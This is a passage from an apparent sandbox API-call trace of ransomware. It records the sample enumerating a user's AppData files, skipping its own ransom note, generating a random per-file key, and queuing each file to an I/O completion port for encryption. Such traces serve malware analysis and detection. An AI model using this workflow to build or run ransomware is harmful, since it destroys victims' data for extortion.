param_1=0x19ea02, param_2="%02X" | out: param_1="C1") returned 2 [0122.529] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="D4") returned 2 [0122.529] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="6A") returned 2 [0122.529] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="3D") returned 2 [0122.529] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="76") returned 2 [0122.529] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="F1") returned 2 [0122.529] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="47") returned 2 [0122.529] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="C2") returned 2 [0122.529] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="90") returned 2 [0122.529] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="93") returned 2 [0122.529] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="84") returned 2 [0122.529] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="EB") returned 2 [0122.529] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="43") returned 2 [0122.529] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="97") returned 2 [0122.529] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="05") returned 2 [0122.529] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="6B") returned 2 [0122.529] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="D5") returned 2 [0122.529] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="A7") returned 2 [0122.529] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="0F") returned 2 [0122.529] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="73") returned 2 [0122.529] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="A9") returned 2 [0122.529] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="DA") returned 2 [0122.529] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="06") returned 2 [0122.529] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="C9") returned 2 [0122.529] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="6D") returned 2 [0122.530] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-Ou_.avi" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-Ou_.avi") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-Ou_.avi" [0122.530] CreateIoCompletionPort (FileHandle=0x318, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0122.531] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0122.531] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7eb5e7d0, ftCreationTime.dwHighDateTime=0x1d701e8, ftLastAccessTime.dwLowDateTime=0x38cc5e80, ftLastAccessTime.dwHighDateTime=0x1d70610, ftLastWriteTime.dwLowDateTime=0x38cc5e80, ftLastWriteTime.dwHighDateTime=0x1d70610, nFileSizeHigh=0x0, nFileSizeLow=0x10994, dwReserved0=0xa0000003, dwReserved1=0x6265c0, cFileName="2IJgy.avi", cAlternateFileName="")) returned 1 [0122.532] StrStrIW (lpFirst="2IJgy.avi", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.532] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\2IJgy.avi") returned 51 [0122.532] PathFindExtensionW (pszPath="2IJgy.avi") returned=".avi" [0122.532] lstrlenW (lpString=".avi") returned 4 [0122.532] PathFindExtensionW (pszPath="2IJgy.avi") returned=".avi" [0122.532] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0122.532] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\2IJgy.avi" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\2ijgy.avi"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x30c [0122.533] GetFileSizeEx (in: hFile=0x30c, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=67988) returned 1 [0122.533] GetProcessHeap () returned 0x600000 [0122.533] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x670340 [0122.537] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="04") returned 2 [0122.537] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="BB") returned 2 [0122.537] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="02") returned 2 [0122.537] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="61") returned 2 [0122.537] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="3B") returned 2 [0122.537] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="78") returned 2 [0122.537] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="82") returned 2 [0122.537] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="20") returned 2 [0122.537] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="6F") returned 2 [0122.537] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="5F") returned 2 [0122.537] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="4C") returned 2 [0122.537] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="F6") returned 2 [0122.537] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="8F") returned 2 [0122.537] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="C8") returned 2 [0122.537] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="9E") returned 2 [0122.537] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="36") returned 2 [0122.537] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="B4") returned 2 [0122.537] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="35") returned 2 [0122.537] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="C7") returned 2 [0122.537] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="92") returned 2 [0122.537] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="39") returned 2 [0122.537] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="9B") returned 2 [0122.538] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="2E") returned 2 [0122.538] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="71") returned 2 [0122.538] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="D8") returned 2 [0122.538] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="5A") returned 2 [0122.538] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="3A") returned 2 [0122.538] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="59") returned 2 [0122.538] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="C6") returned 2 [0122.538] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="52") returned 2 [0122.538] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="51") returned 2 [0122.538] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="3B") returned 2 [0122.539] lstrcpyW (in: lpString1=0x6803f4, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\2IJgy.avi" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\2IJgy.avi") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\2IJgy.avi" [0122.539] CreateIoCompletionPort (FileHandle=0x30c, ExistingCompletionPort=0x274, CompletionKey=0x670340, NumberOfConcurrentThreads=0x0) returned 0x274 [0122.539] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x670340, lpOverlapped=0x670340) returned 1 [0122.539] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8e9cf0, ftCreationTime.dwHighDateTime=0x1d6fca3, ftLastAccessTime.dwLowDateTime=0x9e191ba0, ftLastAccessTime.dwHighDateTime=0x1d705a4, ftLastWriteTime.dwLowDateTime=0x9e191ba0, ftLastWriteTime.dwHighDateTime=0x1d705a4, nFileSizeHigh=0x0, nFileSizeLow=0xe446, dwReserved0=0xa0000003, dwReserved1=0x6265c0, cFileName="4iuw0nZrNkShxp3.xlsx", cAlternateFileName="4IUW0N~1.XLS")) returned 1 [0122.539] StrStrIW (lpFirst="4iuw0nZrNkShxp3.xlsx", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.539] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\4iuw0nZrNkShxp3.xlsx") returned 62 [0122.539] PathFindExtensionW (pszPath="4iuw0nZrNkShxp3.xlsx") returned=".xlsx" [0122.539] lstrlenW (lpString=".xlsx") returned 5 [0122.539] PathFindExtensionW (pszPath="4iuw0nZrNkShxp3.xlsx") returned=".xlsx" [0122.539] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0122.539] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\4iuw0nZrNkShxp3.xlsx" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\4iuw0nzrnkshxp3.xlsx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x308 [0122.541] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=58438) returned 1 [0122.541] GetProcessHeap () returned 0x600000 [0122.541] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30a0048 [0122.544] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="A1") returned 2 [0122.544] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="FB") returned 2 [0122.544] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="0F") returned 2 [0122.544] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="22") returned 2 [0122.544] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="23") returned 2 [0122.544] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="54") returned 2 [0122.544] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="E1") returned 2 [0122.544] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="0E") returned 2 [0122.545] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="92") returned 2 [0122.545] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="70") returned 2 [0122.545] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="09") returned 2 [0122.545] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="A7") returned 2 [0122.545] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="A5") returned 2 [0122.545] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="9A") returned 2 [0122.545] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="DC") returned 2 [0122.545] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="7F") returned 2 [0122.545] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="4A") returned 2 [0122.545] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="09") returned 2 [0122.545] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="0B") returned 2 [0122.545] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="25") returned 2 [0122.545] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="4F") returned 2 [0122.545] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="84") returned 2 [0122.545] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="99") returned 2 [0122.545] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="0F") returned 2 [0122.545] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="1B") returned 2 [0122.545] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="2E") returned 2 [0122.545] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="C0") returned 2 [0122.546] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="D0") returned 2 [0122.546] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="D8") returned 2 [0122.546] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="51") returned 2 [0122.546] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="26") returned 2 [0122.546] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="22") returned 2 [0122.546] lstrcpyW (in: lpString1=0x30b00fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\4iuw0nZrNkShxp3.xlsx" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\4iuw0nZrNkShxp3.xlsx") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\4iuw0nZrNkShxp3.xlsx" [0122.547] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x274, CompletionKey=0x30a0048, NumberOfConcurrentThreads=0x0) returned 0x274 [0122.547] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30a0048, lpOverlapped=0x30a0048) returned 1 [0122.547] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb5528b60, ftCreationTime.dwHighDateTime=0x1d70948, ftLastAccessTime.dwLowDateTime=0x8ef23b70, ftLastAccessTime.dwHighDateTime=0x1d7098c, ftLastWriteTime.dwLowDateTime=0x8ef23b70, ftLastWriteTime.dwHighDateTime=0x1d7098c, nFileSizeHigh=0x0, nFileSizeLow=0x6001, dwReserved0=0xa0000003, dwReserved1=0x6265c0, cFileName="4wgUwOseTEhyM.avi", cAlternateFileName="4WGUWO~1.AVI")) returned 1 [0122.547] StrStrIW (lpFirst="4wgUwOseTEhyM.avi", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.547] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\4wgUwOseTEhyM.avi") returned 59 [0122.547] PathFindExtensionW (pszPath="4wgUwOseTEhyM.avi") returned=".avi" [0122.547] lstrlenW (lpString=".avi") returned 4 [0122.547] PathFindExtensionW (pszPath="4wgUwOseTEhyM.avi") returned=".avi" [0122.547] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0122.547] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\4wgUwOseTEhyM.avi" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\4wguwosetehym.avi"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0122.548] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=24577) returned 1 [0122.548] GetProcessHeap () returned 0x600000 [0122.548] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30c81a0 [0122.551] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="44") returned 2 [0122.551] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="B0") returned 2 [0122.551] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="D3") returned 2 [0122.551] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="E7") returned 2 [0122.551] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="21") returned 2 [0122.551] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="FA") returned 2 [0122.551] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="C0") returned 2 [0122.551] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="62") returned 2 [0122.551] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="44") returned 2 [0122.551] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="E5") returned 2 [0122.551] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="09") returned 2 [0122.551] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="78") returned 2 [0122.551] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="C9") returned 2 [0122.551] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="D8") returned 2 [0122.551] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="5D") returned 2 [0122.551] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="64") returned 2 [0122.552] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="E2") returned 2 [0122.552] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="E5") returned 2 [0122.552] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="D4") returned 2 [0122.552] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="7A") returned 2 [0122.552] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="F6") returned 2 [0122.552] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="24") returned 2 [0122.552] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="1E") returned 2 [0122.552] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="56") returned 2 [0122.552] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="79") returned 2 [0122.552] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="E7") returned 2 [0122.552] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="99") returned 2 [0122.552] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="DA") returned 2 [0122.552] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="A0") returned 2 [0122.552] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="D6") returned 2 [0122.552] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="6B") returned 2 [0122.552] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="64") returned 2 [0122.553] lstrcpyW (in: lpString1=0x30d8254, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\4wgUwOseTEhyM.avi" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\4wgUwOseTEhyM.avi") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\4wgUwOseTEhyM.avi" [0122.553] CreateIoCompletionPort (FileHandle=0x32c, ExistingCompletionPort=0x274, CompletionKey=0x30c81a0, NumberOfConcurrentThreads=0x0) returned 0x274 [0122.553] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30c81a0, lpOverlapped=0x30c81a0) returned 1 [0122.553] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbdacb190, ftCreationTime.dwHighDateTime=0x1d6fe18, ftLastAccessTime.dwLowDateTime=0xd03a0c70, ftLastAccessTime.dwHighDateTime=0x1d702cf, ftLastWriteTime.dwLowDateTime=0xd03a0c70, ftLastWriteTime.dwHighDateTime=0x1d702cf, nFileSizeHigh=0x0, nFileSizeLow=0x8c46, dwReserved0=0xa0000003, dwReserved1=0x6265c0, cFileName="64GfBcTvo.bmp", cAlternateFileName="64GFBC~1.BMP")) returned 1 [0122.553] StrStrIW (lpFirst="64GfBcTvo.bmp", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.553] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\64GfBcTvo.bmp") returned 55 [0122.553] PathFindExtensionW (pszPath="64GfBcTvo.bmp") returned=".bmp" [0122.553] lstrlenW (lpString=".bmp") returned 4 [0122.553] PathFindExtensionW (pszPath="64GfBcTvo.bmp") returned=".bmp" [0122.553] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0122.553] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\64GfBcTvo.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\64gfbctvo.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x324 [0122.555] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=35910) returned 1 [0122.555] GetProcessHeap () returned 0x600000 [0122.555] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x32a0f08 [0122.563] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="A7") returned 2 [0122.563] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="01") returned 2 [0122.563] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="08") returned 2 [0122.563] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="E0") returned 2 [0122.563] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="48") returned 2 [0122.563] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="7A") returned 2 [0122.563] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="5B") returned 2 [0122.563] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="09") returned 2 [0122.563] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="0A") returned 2 [0122.563] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="FB") returned 2 [0122.563] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="0A") returned 2 [0122.563] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="FA") returned 2 [0122.563] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="B6") returned 2 [0122.563] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="0F") returned 2 [0122.563] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="85") returned 2 [0122.563] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="5A") returned 2 [0122.563] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="CB") returned 2 [0122.563] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="2B") returned 2 [0122.563] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="98") returned 2 [0122.563] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="71") returned 2 [0122.563] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="24") returned 2 [0122.563] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="AA") returned 2 [0122.563] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="80") returned 2 [0122.563] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="C2") returned 2 [0122.563] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="4C") returned 2 [0122.563] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="F9") returned 2 [0122.563] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="85") returned 2 [0122.563] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="8C") returned 2 [0122.563] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="1D") returned 2 [0122.563] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="30") returned 2 [0122.564] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="B0") returned 2 [0122.564] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="66") returned 2 [0122.564] lstrcpyW (in: lpString1=0x32b0fbc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\64GfBcTvo.bmp" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\64GfBcTvo.bmp") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\64GfBcTvo.bmp" [0122.564] CreateIoCompletionPort (FileHandle=0x324, ExistingCompletionPort=0x274, CompletionKey=0x32a0f08, NumberOfConcurrentThreads=0x0) returned 0x274 [0122.564] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x32a0f08, lpOverlapped=0x32a0f08) returned 1 [0122.564] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37ecd500, ftCreationTime.dwHighDateTime=0x1d6fdee, ftLastAccessTime.dwLowDateTime=0x36bdbf60, ftLastAccessTime.dwHighDateTime=0x1d70216, ftLastWriteTime.dwLowDateTime=0x36bdbf60, ftLastWriteTime.dwHighDateTime=0x1d70216, nFileSizeHigh=0x0, nFileSizeLow=0x11afa, dwReserved0=0xa0000003, dwReserved1=0x6265c0, cFileName="6oJyejxtw_dKmNa.m4a", cAlternateFileName="6OJYEJ~1.M4A")) returned 1 [0122.565] StrStrIW (lpFirst="6oJyejxtw_dKmNa.m4a", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.565] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\6oJyejxtw_dKmNa.m4a") returned 61 [0122.565] PathFindExtensionW (pszPath="6oJyejxtw_dKmNa.m4a") returned=".m4a" [0122.565] lstrlenW (lpString=".m4a") returned 4 [0122.565] PathFindExtensionW (pszPath="6oJyejxtw_dKmNa.m4a") returned=".m4a" [0122.565] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0122.565] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\6oJyejxtw_dKmNa.m4a" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\6ojyejxtw_dkmna.m4a"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x320 [0122.566] GetFileSizeEx (in: hFile=0x320, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=72442) returned 1 [0122.566] GetProcessHeap () returned 0x600000 [0122.566] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x32c9060 [0122.577] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="6A") returned 2 [0122.577] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="D1") returned 2 [0122.577] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="D5") returned 2 [0122.577] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="46") returned 2 [0122.577] 